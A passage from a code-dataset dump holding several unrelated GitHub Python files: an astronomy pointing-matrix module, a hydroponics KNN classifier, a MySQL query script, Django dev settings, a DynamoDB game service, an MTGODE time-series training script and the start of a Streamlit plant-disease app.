isinstance\"\"\"\n try:\n self.geom.ntile\n return True\n except AttributeError:\n return False\n\n def _comp_count(self, comps=None):\n \"\"\"Returns the number of spin components for component code comps.\n\n \"\"\"\n if comps is None:\n comps = self.comps\n return len(comps)\n\n def _get_proj(self):\n if self.geom is None:\n raise ValueError(\"Can't project without a geometry!\")\n # Backwards compatibility for old so3g\n interpol_kw = _get_interpol_args(self.interpol)\n if self.tiled:\n return so3g.proj.Projectionist.for_tiled(\n self.geom.shape, self.geom.wcs, self.geom.tile_shape,\n active_tiles=self.active_tiles, **interpol_kw)\n else:\n return so3g.proj.Projectionist.for_geom(self.geom.shape,\n self.geom.wcs, **interpol_kw)\n\n def _get_proj_threads(self, cuts=None):\n \"\"\"Return the Projectionist and sample-thread assignment for the\n present geometry. If the thread assignment has not been\n determined yet, it is done now and cached in self.threads. In\n tiled geometries, if self.active_tiles has not been\n determined, that is done now and cached.\n\n The returned sample-thread assignment is modified by \"cuts\",\n which defaults to self.cuts if passed as None. I.e. 
after\n        computing or looking up the full self.threads, the code\n        returns (proj, self.threads*~cuts).\n\n        Returns:\n          Tuple (proj, threads*cuts).\n\n        \"\"\"\n        proj = self._get_proj()\n        if cuts is None:\n            cuts = self.cuts\n\n        if self.tiled and self.active_tiles is None:\n            logger.info('_get_proj_threads: get_active_tiles')\n            if isinstance(self.threads, str) and self.threads == 'tiles':\n                logger.info('_get_proj_threads: assigning using "tiles"')\n                tile_info = proj.get_active_tiles(self._get_asm(), assign=True)\n                _tile_threads = wrap_ranges(tile_info['group_ranges'])\n            else:\n                tile_info = proj.get_active_tiles(self._get_asm())\n            self.active_tiles = tile_info['active_tiles']\n            proj = self._get_proj()\n\n        if self.threads is False:\n            return proj, ~cuts\n        if self.threads is None:\n            self.threads = 'domdir'\n        if isinstance(self.threads, str):\n            if self.threads in ['simple', 'domdir']:\n                logger.info(f'_get_proj_threads: assigning using "{self.threads}"')\n                self.threads = wrap_ranges(proj.assign_threads(\n                    self._get_asm(), method=self.threads))\n            elif self.threads == 'tiles':\n                # Computed above unless logic failed us...\n                self.threads = _tile_threads\n            else:\n                raise ValueError('Request for unknown algo threads="%s"' % self.threads)\n        if cuts:\n            threads = self.threads * ~cuts\n        else:\n            threads = self.threads\n        return proj, threads\n\n    def _get_asm(self):\n        \"\"\"Bundles self.fp and self.sight into an "Assembly" for calling\n        so3g.proj routines.\"\"\"\n        so3g_fp = so3g.proj.FocalPlane()\n        for i, q in enumerate(self.fp):\n            so3g_fp[f'a{i}'] = q\n        return so3g.proj.Assembly.attach(self.sight, so3g_fp)\n\n    def _prepare_map(self, map):\n        if self.tiled: return map.tiles\n        else: return map\n\nclass P_PrecompDebug:\n    def __init__(self, geom, pixels, phases):\n        self.geom = wrap_geom(geom).nopre\n        self.pixels = pixels\n        self.phases = phases\n    def zeros(self, super_shape=None):\n        if super_shape is None: super_shape = (self.phases.shape[2],)\n        return enmap.zeros(super_shape + self.geom.shape, self.geom.wcs)\n    def to_map(self, dest=None, signal=None, comps=None):\n        if dest is None: dest = self.zeros()\n        proj = so3g.ProjEng_Precomp_NonTiled()\n        proj.to_map(dest, self.pixels, self.phases, signal, None, None)\n        return dest\n    def from_map(self, signal_map, dest=None, comps=None):\n        if dest is None: dest = np.zeros(self.pixels.shape[:2], np.float32)\n        proj = so3g.ProjEng_Precomp_NonTiled()\n        proj.from_map(signal_map, self.pixels, self.phases, dest)\n        return dest\n\ndef wrap_geom(geom):\n    if isinstance(geom, tuple) or isinstance(geom, list):\n        return enmap.Geometry(*geom)\n    else:\n        return geom\n\n# Helpers for backwards compatibility with old so3g. 
Consider removing these\n# once transition is done.\ndef wrap_ranges(ranges):\n if _so3g_ivals_format() == 1:\n return so3g.proj.ranges.RangesMatrix([ranges])\n else:\n return ranges\n\ndef unwrap_ranges(ranges):\n if _so3g_ivals_format() == 1:\n assert len(ranges) == 1, \"Old so3g only supports simple (1-bunch) thread ranges, but got thread ranges with shape %s\" % (str(ranges.shape))\n return ranges[0]\n else:\n return ranges\n\ndef _so3g_ivals_format():\n projclass = so3g.proj.Projectionist\n if not hasattr(projclass, '_ivals_format'):\n return 1\n else:\n return projclass._ivals_format\n\ndef _get_interpol_args(interpol):\n if _so3g_ivals_format() >= 2:\n return {'interpol': interpol}\n assert interpol in [None, \"nn\", \"nearest\"], \"Old so3g does not support interpolated mapmaking\"\n return {}\n","repo_name":"simonsobs/sotodlib","sub_path":"sotodlib/coords/pmat.py","file_name":"pmat.py","file_ext":"py","file_size_in_byte":21855,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"3553214957","text":"# Importing libraries\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport time\nimport sklearn\nfrom sklearn.utils import shuffle\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import classification_report, plot_confusion_matrix\nimport matplotlib.pyplot as plt\n\n# Reading CSV datasets\nacc_df = pd.read_csv(\"MOCK_DATA.csv\")\nacc_df.fillna(0, inplace=True)\nacc_df['Acceptable'] = True\nunacc_df = pd.read_csv(\"MOCK_DATA-1.csv\")\nunacc_df.fillna(0, inplace=True)\nunacc_df['Acceptable'] = False\ndf = acc_df.append(unacc_df, ignore_index=True)\nshuffle(df)\n\n# Separating into features and labels\nX = df.loc[:, df.columns != 'Acceptable']\ny = df.loc[:, df.columns == 'Acceptable']\n\nstart1 = time.time()\nbestAcc = 0\n# Training the best model using pickle and for loop\nfor _ in range(1000):\n\n # Separating training and testing set\n X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, test_size=0.2, random_state=1)\n\n # Scaling features\n scaler = StandardScaler()\n X_train = scaler.fit_transform(X_train.astype(np.float32))\n X_test = scaler.transform(X_test.astype(np.float32))\n\n # Training KNN model\n model = KNeighborsClassifier(n_neighbors=9)\n model.fit(X_train, y_train.values.ravel())\n acc = model.score(X_test, y_test.values.ravel())\n print(str(_) + \" Accuracy: \" + str(acc))\n if acc > bestAcc:\n bestAcc = acc\n with open(\"bestModel.pickle\", \"wb\") as f:\n pickle.dump(model, f)\nstop1 = time.time()\n\n# Loading best model\npickle_in = open(\"bestModel.pickle\", \"rb\")\nmodel = pickle.load(pickle_in)\n\n# Classification report and model accuracy\ny_pred = model.predict(X_test)\nclassification_report = classification_report(y_test, y_pred)\naccuracy = model.score(X_test, y_test)\nprint()\nprint(\"CLASSIFICATION REPORT\")\nprint(classification_report)\nprint(f\"MODEL ACCURACY: {round(bestAcc * 100, 2)}%\")\nprint()\nprint(f\"TRAINING TIME: {round(stop1 - start1, 2)}s\")\ndisp = plot_confusion_matrix(model, X_test, y_test)\nprint(disp)\nplt.show()\n\n# Getting user input\npH_level = float(input('Input pH Level: '))\nec_level = float(input('Input EC Level: '))\narea_of_lettuce = float(input('Input Area of Lettuce: '))\n\n# Preprocessing user input\ninputs = [[pH_level, ec_level, area_of_lettuce]]\nnew_inputs = scaler.transform(inputs)\nnew_inputs = pd.DataFrame(new_inputs, 
columns=(df.columns[0:3]))\n\n# Predicting from user input\nstart2 = time.time()\npred = model.predict(new_inputs)\nstop2 = time.time()\nprint()\nprint(f\"INPUTS: pH Level = {pH_level}, EC Level = {ec_level}, Area of Lettuce = {area_of_lettuce}\")\nprint(f\"PREDICTION: ACCEPTABLE = {pred}\")\nprint(f\"PREDICTION TIME: {stop2 - start2} s\")\nif pred:\n    print()\n    print(\"ACTION: CLOSE VALVE\")\nelse:\n    print()\n    print(\"ACTION: OPEN VALVE\")\n\n# Getting new CSV file\nfilename = str(input(\"Input CSV File Name: \"))\nnew_df = pd.read_csv(filename)\nnew_df.fillna(0, inplace=True)\n\n# Predicting acceptable values from CSV file\narr1 = []\narr2 = []\nfor i in new_df.index:\n    pH_level = new_df['pH_level'][i]\n    ec_level = new_df['ec_level'][i]\n    area_of_lettuce = new_df['area_of_lettuce'][i]\n    temp_df = scaler.transform([[pH_level, ec_level, area_of_lettuce]])\n    temp_df = pd.DataFrame(temp_df, columns=df.columns[0:3])\n    pred = model.predict(temp_df)\n    arr1.append(pred)\n    if pred:\n        arr2.append('CLOSE VALVE')\n    else:\n        arr2.append('OPEN VALVE')\narr1 = pd.DataFrame(arr1)\narr2 = pd.DataFrame(arr2)\nnew_df['Acceptable'] = arr1\nnew_df['Action'] = arr2\nprint(new_df)","repo_name":"johnrivera0987/Hydroponics-KNN","sub_path":"Hydroponics-KNN.py","file_name":"Hydroponics-KNN.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34166751750","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time    : 2019/1/24 14:57\n# @Author  : LiangJiangHao\n# @Software: PyCharm\nimport pymysql\nimport datetime\n\nclass biliTable(object):\n    def __init__(self):\n        self.client =pymysql.Connect(\n            host='127.0.0.1',\n            port=3306,\n            user='root',\n            passwd='123456',\n            db='bili',\n            charset='utf8mb4',\n            cursorclass=pymysql.cursors.DictCursor\n\n        )\n        self.cur = self.client.cursor()\n    def selectStr(self):\n        sql='select * from bili limit 10000 '\n        self.cur.execute(sql)\n        dataArr=self.cur.fetchall()\n        # print(dataArr)\n        return dataArr\n\nnow_time = datetime.datetime.now()\nprint(now_time)\n\nbili=biliTable()\ndataArr=bili.selectStr()\n#\nprint(len(dataArr))\n\nnew_time = datetime.datetime.now()\nprint(new_time-now_time)\n# n_1kw=0\n# n_2kw=0\n# n_3kw=0\n# n_4kw=0\n# n_error=0\n# for video in dataArr:\n#     url=video['videoUrl']\n#     aid=url.split('aid=')[1]\n#     print(aid)\n#     if int(aid)<10000000:\n#         n_1kw+=1\n#     elif int(aid)<20000000:\n#         n_2kw+=1\n#     elif int(aid)<30000000:\n#         n_3kw+=1\n#     elif int(aid)<40000000:\n#         n_4kw+=1\n#     else:\n#         n_error+=1\n# resultStr='n_1kw=%s,n_2kw=%s,n_3kw=%s,n_4kw=%s,n_error=%s'%(n_1kw,n_2kw,n_3kw,n_4kw,n_error)\n# print(resultStr)","repo_name":"Liangjianghao/bili","sub_path":"dataDeal/numberCount.py","file_name":"numberCount.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17240271143","text":"# -*- coding: utf-8 -*-\nfrom leva_api.settings.base import *\n\nDEBUG = True\nTHUMBNAIL_DEBUG = True\n\nBASE_URL = 'http://127.0.0.1:8000/'\nCLIENT_BASE_URL = 'http://127.0.0.1:4200/'\nALLOWED_HOSTS = ['*', ]\n\nBASE_PATH = \"/var/www/leva_api/\"\n\nTHIRD_PARTY_APPS += [\n    'debug_toolbar',\n    'django_extensions',\n]\n\nINSTALLED_APPS = INSTALLED_APPS + THIRD_PARTY_APPS + PROJECT_APPS\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.postgresql_psycopg2',\n        'NAME': 'leva',\n        'USER': 'leva_user',\n        'PASSWORD': 'root',\n        'HOST': '127.0.0.1',\n        'PORT': '5432'\n        
}\n}\n","repo_name":"levon2111/leva_api","sub_path":"leva_api/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14944630453","text":"import random\nimport string\nfrom typing import Dict, Optional, TypedDict\n\nfrom mypy_boto3_dynamodb.service_resource import Table\n\nfrom entities.base_entity import (\n Entity,\n EntityRepository,\n EntityService,\n RawEntity,\n)\nfrom entities.custom_types import USER_ENTITY_PREFIX, GameSide, GameStatus\nfrom entities.game_user_relation import GameUserRelation, GameUserService\nfrom entities.user_game_relation import UserGameRelation, UserGameService\nfrom game_state import append_action_to_state\nfrom utils import get_time\n\n\nclass GameInformation(TypedDict):\n State: str\n Status: int\n StartTime: int\n UpdateTime: int\n ASideConnections: Dict[str, str]\n BSideConnections: Dict[str, str]\n GuestConnections: Dict[str, str]\n\n\nclass RawGameEntity(RawEntity, GameInformation):\n pass\n\n\nclass GameEntity(Entity, GameInformation):\n GameId: str\n\n\nclass GameRepository(EntityRepository[RawGameEntity, GameEntity]):\n \"\"\"\n Repository class for game entities with key schema:\n PK: Game_[GAME_ID]\n SK: Game_[GAME_ID]\n Entity primary key field name: GameId\n \"\"\"\n\n def __init__(\n self,\n table: Table,\n ) -> None:\n super().__init__(\n table, prefix=USER_ENTITY_PREFIX, entity_pk_field=\"GameId\"\n )\n\n\nclass GameService(EntityService[GameEntity]):\n def __init__(\n self,\n repository: GameRepository,\n user_game_service: UserGameService,\n game_user_service: GameUserService,\n ):\n super().__init__(repository)\n self._user_game_service = user_game_service\n self._game_user_service = game_user_service\n self._id_alphabet = string.ascii_letters + string.digits\n\n def create_new_game(\n self, game_id: Optional[str], username: str, user_connection_id: str\n ) -> GameEntity:\n if game_id is None:\n game_id = self._generate_game_id()\n\n if self.exists_by_key(game_id):\n raise Exception(\"Game item with id=%s already exists\" % game_id)\n\n current_time = get_time()\n\n new_entity = GameEntity(\n GameId=game_id,\n State=\"\",\n Status=GameStatus.STARTED.value,\n StartTime=current_time,\n UpdateTime=current_time,\n ASideConnections={username: user_connection_id},\n BSideConnections=dict(),\n GuestConnections=dict(),\n )\n self._repository.save(new_entity)\n\n user_game_relation = UserGameRelation(\n Username=username,\n GameId=game_id,\n GameStatus=GameStatus.STARTED.value,\n GameSide=GameSide.A.value,\n StartTime=current_time,\n JoinTime=current_time,\n )\n self._user_game_service.save(user_game_relation)\n\n game_user_relation = GameUserRelation(\n GameId=game_id, Username=username, JoinTime=current_time\n )\n self._game_user_service.save(game_user_relation)\n\n return new_entity\n\n def add_user_to_game_side(\n self,\n game_id: str,\n username: str,\n side: GameSide,\n user_connection_id: str,\n ) -> GameEntity:\n game_entity = self._get_non_null_by_key(game_id)\n current_time = get_time()\n\n game_entity[\"GuestConnections\"].pop(username, \"\")\n if side == GameSide.A:\n game_entity[\"ASideConnections\"][username] = user_connection_id\n else:\n game_entity[\"BSideConnections\"][username] = user_connection_id\n self._repository.save(game_entity)\n\n user_game_relation = UserGameRelation(\n Username=username,\n GameId=game_id,\n GameStatus=GameStatus.STARTED.value,\n GameSide=side.value,\n 
StartTime=game_entity[\"StartTime\"],\n JoinTime=current_time,\n )\n self._user_game_service.save(user_game_relation)\n\n game_user_relation = GameUserRelation(\n GameId=game_id, Username=username, JoinTime=current_time\n )\n self._game_user_service.save(game_user_relation)\n\n return game_entity\n\n def add_user_as_guest(\n self, game_id: str, username: str, user_connection_id: str\n ) -> GameEntity:\n game_entity = self._get_non_null_by_key(game_id)\n\n game_entity[\"GuestConnections\"][username] = user_connection_id\n self._repository.save(game_entity)\n\n return game_entity\n\n def append_state_action_to_game(\n self, game_id: str, state_action: str\n ) -> GameEntity:\n game_entity = self._get_non_null_by_key(game_id)\n game_entity[\"State\"] = append_action_to_state(\n game_entity[\"State\"], state_action\n )\n\n self._repository.save(game_entity)\n return game_entity\n\n def _generate_game_id(self) -> str:\n \"\"\"\n :return: a randomly generated game id string with 8 characters\n \"\"\"\n return \"\".join(random.choices(self._id_alphabet, k=8))\n","repo_name":"sikleber/Beerpongo","sub_path":"sys-src/backend/src/entities/game_entity.py","file_name":"game_entity.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"14040949230","text":"import argparse\nimport math\nimport time\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom util import *\n# from trainer import Optim\nfrom model import MTGODE\n\n\ndef str_to_bool(value):\n if isinstance(value, bool):\n return value\n if value.lower() in {'false', 'f', '0', 'no', 'n'}:\n return False\n elif value.lower() in {'true', 't', '1', 'yes', 'y'}:\n return True\n raise ValueError(f'{value} is not a valid boolean value')\n\n\nparser = argparse.ArgumentParser(description='MTGODE')\n\n# general settings\nparser.add_argument('--expid', type=int, default=0, help='experiment id when saving best model')\nparser.add_argument('--runs', type=int, default=1, help='number of runs')\nparser.add_argument('--device', type=str, default='cuda:0')\nparser.add_argument('--data', type=str, default='../data/solar_AL.txt')\nparser.add_argument('--save', type=str, default='./save/', help='save path')\nparser.add_argument('--save_preds', type=str_to_bool, default=True, help='whether to save prediction results')\nparser.add_argument('--save_preds_path', type=str, default='./results/', help='predictions save path')\nparser.add_argument('--num_nodes', type=int, default=137, help='number of nodes/variables')\nparser.add_argument('--normalize', type=int, default=2, help='raw data normalization')\nparser.add_argument('--in_dim', type=int, default=1, help='inputs dimension')\nparser.add_argument('--seq_in_len', type=int, default=24*7, help='input sequence length')\nparser.add_argument('--seq_out_len', type=int, default=1, help='output sequence length')\nparser.add_argument('--horizon', type=int, default=3)\n\n# training related\nparser.add_argument('--epochs', type=int, default=40, help='')\nparser.add_argument('--batch_size', type=int, default=4, help='batch size')\nparser.add_argument('--lr', type=float, default=0.0001, help='learning rate')\nparser.add_argument('--weight_decay', type=float, default=0.00001, help='weight decay rate')\nparser.add_argument('--lr_decay', type=str_to_bool, default=False, help='whether to decrease lr during training')\nparser.add_argument('--lr_decay_steps', type=str, default='20,40', help='lr decay at these 
steps')\nparser.add_argument('--lr_decay_rate', type=float, default=0.5, help='how much lr will decay')\nparser.add_argument('--dropout', type=float, default=0.3, help='dropout rate')\nparser.add_argument('--clip', type=int, default=5, help='clip')\nparser.add_argument('--L1Loss', type=str_to_bool, default=True, help='whether to use L1loss as criterion')\nparser.add_argument('--optim', type=str, default='adam')\n\n# model related\nparser.add_argument('--buildA_true', type=str_to_bool, default=True, help='whether to construct adaptive adjacency matrix')\nparser.add_argument('--subgraph_size', type=int, default=20, help='k')\nparser.add_argument('--tanhalpha', type=float, default=3, help='tanh alpha')\nparser.add_argument('--node_dim', type=int, default=40, help='dim of nodes')\nparser.add_argument('--num_split', type=int, default=1, help='number of splits for graphs')\nparser.add_argument('--step_size', type=int, default=100, help='step_size')\nparser.add_argument('--dilation_exponential', type=int, default=2, help='dilation exponential')\nparser.add_argument('--conv_channels', type=int, default=64, help='convolution channels')\nparser.add_argument('--end_channels', type=int, default=64, help='end channels')\nparser.add_argument('--solver_1', type=str, default='euler', help='CTA Solver')\nparser.add_argument('--time_1', type=float, default=1.0, help='CTA integration time')\nparser.add_argument('--step_1', type=float, default=0.167, help='CTA step size')\nparser.add_argument('--solver_2', type=str, default='euler', help='CGP Solver')\nparser.add_argument('--time_2', type=float, default=1.0, help='CGP integration time')\nparser.add_argument('--step_2', type=float, default=0.25, help='CGP step size')\nparser.add_argument('--alpha', type=float, default=2.0, help='CGP alpha to control eigenvalues range: [0, alpha]')\nparser.add_argument('--rtol', type=float, default=1e-4, help='rtol')\nparser.add_argument('--atol', type=float, default=1e-3, help='atol')\nparser.add_argument('--adjoint', type=str_to_bool, default=False, help='whether to use adjoint method')\nparser.add_argument('--perturb', type=str_to_bool, default=False, help='')\n\nargs = parser.parse_args()\ndevice = torch.device(args.device)\ntorch.set_num_threads(4)\n\nprint(args)\n\n\ndef evaluate(data, X, Y, model, evaluateL2, evaluateL1, batch_size, runid, save_prediction=False):\n model.eval()\n total_loss = 0\n total_loss_l1 = 0\n n_samples = 0\n predict = None\n test = None\n\n for X, Y in data.get_batches(X, Y, batch_size, False):\n X = torch.unsqueeze(X,dim=1)\n X = X.transpose(2,3)\n with torch.no_grad():\n output = model(X)\n # RESET NFE\n model.ODE.odefunc.nfe = 0 # reset CTA nfe\n model.ODE.odefunc.stnet.gconv_1.CGPODE.odefunc.nfe = 0 # reset CGP 1 nfe\n model.ODE.odefunc.stnet.gconv_2.CGPODE.odefunc.nfe = 0 # reset CGP 2 nfe\n output = torch.squeeze(output)\n if len(output.shape)==1:\n output = output.unsqueeze(dim=0)\n if predict is None:\n predict = output\n test = Y\n else:\n predict = torch.cat((predict, output))\n test = torch.cat((test, Y))\n\n scale = data.scale.expand(output.size(0), data.m)\n total_loss += evaluateL2(output * scale, Y * scale).item()\n total_loss_l1 += evaluateL1(output * scale, Y * scale).item()\n n_samples += (output.size(0) * data.m)\n\n rse = math.sqrt(total_loss / n_samples) / data.rse\n rae = (total_loss_l1 / n_samples) / data.rae\n\n all_preds = predict\n all_reals = test.data\n predict = predict.data.cpu().numpy()\n Ytest = test.data.cpu().numpy()\n sigma_p = (predict).std(axis=0)\n sigma_g = 
(Ytest).std(axis=0)\n mean_p = predict.mean(axis=0)\n mean_g = Ytest.mean(axis=0)\n index = (sigma_g != 0)\n correlation = ((predict - mean_p) * (Ytest - mean_g)).mean(axis=0) / (sigma_p * sigma_g)\n correlation = (correlation[index]).mean()\n\n if save_prediction:\n all_preds = all_preds * data.scale.expand(all_preds.size(0), data.m)\n all_reals = all_reals * data.scale.expand(all_reals.size(0), data.m)\n all_preds = all_preds.data.cpu().numpy()\n all_reals = all_reals.data.cpu().numpy()\n print(all_preds.shape)\n print(all_reals.shape)\n np.save(args.save_preds_path + args.data.replace('data/', '').replace('.txt', '') + \"_horizon\" + str(args.horizon)\n + \"_exp\" + str(args.expid) + \"_\" + str(runid) + \"_pred.npy\", all_preds)\n np.save(args.save_preds_path + args.data.replace('data/', '').replace('.txt', '') + \"_horizon\" + str(args.horizon)\n + \"_exp\" + str(args.expid) + \"_\" + str(runid) + \"_true.npy\", all_reals)\n\n return rse, rae, correlation\n\n\ndef train(data, X, Y, model, criterion, optim, batch_size, clip=None):\n model.train()\n total_loss = 0\n n_samples = 0\n iter = 0\n for X, Y in data.get_batches(X, Y, batch_size, True):\n optim.zero_grad()\n X = torch.unsqueeze(X,dim=1)\n X = X.transpose(2, 3)\n if iter % args.step_size == 0:\n perm = np.random.permutation(range(args.num_nodes))\n num_sub = int(args.num_nodes / args.num_split)\n\n for j in range(args.num_split):\n if j != args.num_split - 1:\n id = perm[j * num_sub:(j + 1) * num_sub]\n else:\n id = perm[j * num_sub:]\n id = torch.LongTensor(id).to(device)\n tx = X[:, :, id, :]\n ty = Y[:, id] # (B, N)\n output = model(tx, id)\n output = torch.squeeze(output) # (B, N)\n\n # GET/RESET NFE\n nfe_1 = model.ODE.odefunc.nfe # get CTA nfe\n nfe_2 = model.ODE.odefunc.stnet.gconv_1.CGPODE.odefunc.nfe // nfe_1 # get CPG nfe\n model.ODE.odefunc.nfe = 0 # reset CTA nfe\n model.ODE.odefunc.stnet.gconv_1.CGPODE.odefunc.nfe = 0 # reset CGP 1 nfe\n model.ODE.odefunc.stnet.gconv_2.CGPODE.odefunc.nfe = 0 # reset CGP 2 nfe\n\n scale = data.scale.expand(output.size(0), data.m) # (B, N)\n scale = scale[:,id]\n\n loss = criterion(output * scale, ty * scale)\n loss.backward()\n total_loss += loss.item()\n n_samples += (output.size(0) * data.m)\n\n if clip is not None:\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n\n optim.step()\n\n if iter % 100 == 0:\n print('iter:{:3d} | lr {:.6f} | loss: {:.3f} | CTA nfe:{:2d} | CGP nfe:{:2d}'\n .format(iter, optim.param_groups[0]['lr'], loss.item()/(output.size(0) * data.m), nfe_1, nfe_2), flush=True)\n\n iter += 1\n\n return total_loss / n_samples\n\n\ndef main(runid):\n\n # train 60%, valid 20%, test 20%\n Data = DataLoaderS(args.data, 0.6, 0.2, device, args.horizon, args.seq_in_len, args.normalize)\n\n model = MTGODE(buildA_true=args.buildA_true, num_nodes=args.num_nodes, device=device,\n dropout=args.dropout, subgraph_size=args.subgraph_size, node_dim=args.node_dim,\n dilation_exponential=args.dilation_exponential, conv_channels=args.conv_channels,\n end_channels=args.end_channels, seq_length=args.seq_in_len, in_dim=args.in_dim,\n out_dim=args.seq_out_len, tanhalpha=args.tanhalpha, method_1=args.solver_1, time_1=args.time_1,\n step_size_1=args.step_1, method_2=args.solver_2, time_2=args.time_2, step_size_2=args.step_2,\n alpha=args.alpha, rtol=args.rtol, atol=args.atol, adjoint=args.adjoint, perturb=args.perturb,\n ln_affine=False).to(device)\n\n print('The recpetive field size is', model.receptive_field)\n nParams = sum([p.nelement() for p in model.parameters()])\n 
print('Number of model parameters is', nParams, flush=True)\n\n if args.L1Loss:\n criterion = nn.L1Loss(size_average=False).to(device)\n else:\n criterion = nn.MSELoss(size_average=False).to(device)\n\n evaluateL2 = nn.MSELoss(size_average=False).to(device)\n evaluateL1 = nn.L1Loss(size_average=False).to(device)\n\n best_val = 10000000\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n if args.lr_decay:\n lr_decay_steps = args.lr_decay_steps.split(',')\n lr_decay_steps = [int(i) for i in lr_decay_steps]\n scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=lr_decay_steps, gamma=args.lr_decay_rate)\n\n # At any point you can hit Ctrl + C to break out of training early.\n try:\n print('begin training')\n for epoch in range(1, args.epochs + 1):\n epoch_start_time = time.time()\n train_loss = train(Data, Data.train[0], Data.train[1], model, criterion, optimizer, args.batch_size,\n args.clip)\n val_loss, val_rae, val_corr = evaluate(Data, Data.valid[0], Data.valid[1], model, evaluateL2, evaluateL1,\n args.batch_size, runid)\n print(\n '| end of epoch {:3d} | time: {:5.2f}s | train_loss {:5.4f} | valid rse {:5.4f} | valid rae {:5.4f} | valid corr {:5.4f}'.format(\n epoch, (time.time() - epoch_start_time), train_loss, val_loss, val_rae, val_corr), flush=True)\n\n # Save the model if the validation loss is the best we've seen so far.\n if val_loss < best_val:\n torch.save(model, args.save + args.data.replace('data/', '').replace('.txt', '') +\n \"_exp\" + str(args.expid) + \"_\" + str(runid) + \".pt\")\n best_val = val_loss\n\n if epoch % 5 == 0:\n test_acc, test_rae, test_corr = evaluate(Data, Data.test[0], Data.test[1], model, evaluateL2, evaluateL1,\n args.batch_size, runid)\n print(\"test rse {:5.4f} | test rae {:5.4f} | test corr {:5.4f}\".format(test_acc, test_rae, test_corr), flush=True)\n\n if args.lr_decay:\n scheduler.step()\n\n except KeyboardInterrupt:\n print('-' * 89)\n print('Exiting from training early')\n\n # Load the best saved model.\n model = torch.load(args.save + args.data.replace('data/', '').replace('.txt', '') + \"_exp\" + str(args.expid) +\n \"_\" + str(runid) + \".pt\")\n\n vtest_acc, vtest_rae, vtest_corr = evaluate(Data, Data.valid[0], Data.valid[1], model, evaluateL2, evaluateL1,\n args.batch_size, runid)\n test_acc, test_rae, test_corr = evaluate(Data, Data.test[0], Data.test[1], model, evaluateL2, evaluateL1,\n args.batch_size, runid, save_prediction=args.save_preds)\n print(\"final test rse {:5.4f} | test rae {:5.4f} | test corr {:5.4f}\".format(test_acc, test_rae, test_corr))\n\n return vtest_acc, vtest_rae, vtest_corr, test_acc, test_rae, test_corr\n\n\nif __name__ == \"__main__\":\n vacc = []\n vrae = []\n vcorr = []\n acc = []\n rae = []\n corr = []\n for i in range(args.runs):\n val_acc, val_rae, val_corr, test_acc, test_rae, test_corr = main(i)\n vacc.append(val_acc)\n vrae.append(val_rae)\n vcorr.append(val_corr)\n acc.append(test_acc)\n rae.append(test_rae)\n corr.append(test_corr)\n print('\\n\\n')\n print('multiple runs average')\n print('\\n\\n')\n print(\"valid\\trse\\trae\\tcorr\")\n print(\"mean\\t{:5.4f}\\t{:5.4f}\\t{:5.4f}\".format(np.mean(vacc), np.mean(vrae), np.mean(vcorr)))\n print(\"std\\t{:5.4f}\\t{:5.4f}\\t{:5.4f}\".format(np.std(vacc), np.std(vrae), np.std(vcorr)))\n print('\\n\\n')\n print(\"test\\trse\\trae\\tcorr\")\n print(\"mean\\t{:5.4f}\\t{:5.4f}\\t{:5.4f}\".format(np.mean(acc), np.mean(rae), np.mean(corr)))\n print(\"std\\t{:5.4f}\\t{:5.4f}\\t{:5.4f}\".format(np.std(acc), 
np.std(rae), np.std(corr)))","repo_name":"GRAND-Lab/MTGODE","sub_path":"run_single_step.py","file_name":"run_single_step.py","file_ext":"py","file_size_in_byte":14050,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"76"} +{"seq_id":"71303851766","text":"import streamlit as st\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport openai\r\nimport re\r\nfrom langchain.agents import load_tools, initialize_agent, AgentType\r\nfrom langchain.memory import ConversationBufferMemory\r\nfrom langchain.chat_models import ChatOpenAI\r\nfrom langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper\r\nfrom langchain.prompts import PromptTemplate, StringPromptTemplate\r\nfrom PIL import Image\r\nimport os\r\n\r\n\r\n\r\n# Input fields for OpenAI API key and Wolfram Alpha API key\r\napi_key = st.sidebar.text_input('Enter your OpenAI API key', type=\"password\")\r\nwolfram_key = st.sidebar.text_input('Enter your Wolfram Alpha API key',type=\"password\")\r\n\r\n# Initialize a warning message\r\nwarning_message = \"\"\r\n\r\n# Check if both API keys are not provided\r\nif not api_key and not wolfram_key:\r\n warning_message = \"Please enter both your OpenAI API key and Wolfram Alpha API key.\"\r\n\r\n# Check if OpenAI API key is provided but Wolfram Alpha API key is missing\r\nelif api_key and not wolfram_key:\r\n warning_message = \"Please enter your Wolfram Alpha API key.\"\r\n\r\n# Check if Wolfram Alpha API key is provided but OpenAI API key is missing\r\nelif not api_key and wolfram_key:\r\n warning_message = \"Please enter your OpenAI API key.\"\r\n\r\n# Display the warning message, if any\r\nif warning_message:\r\n st.sidebar.warning(warning_message)\r\nelse:\r\n # Both keys provided, store them in environment variables\r\n os.environ[\"OPENAI_API_KEY\"] = api_key\r\n openai.api_key = api_key\r\n os.environ[\"WOLFRAM_ALPHA_APPID\"] = wolfram_key\r\n# Initialize conversation memory\r\nconversation_memory = []\r\n\r\nprediction=\"\"\r\n\r\n# Define class labels for each model\r\nclass_labels = {\r\n 'Potato Model': ['Potato___Early_blight', 'Potato___Late_blight', 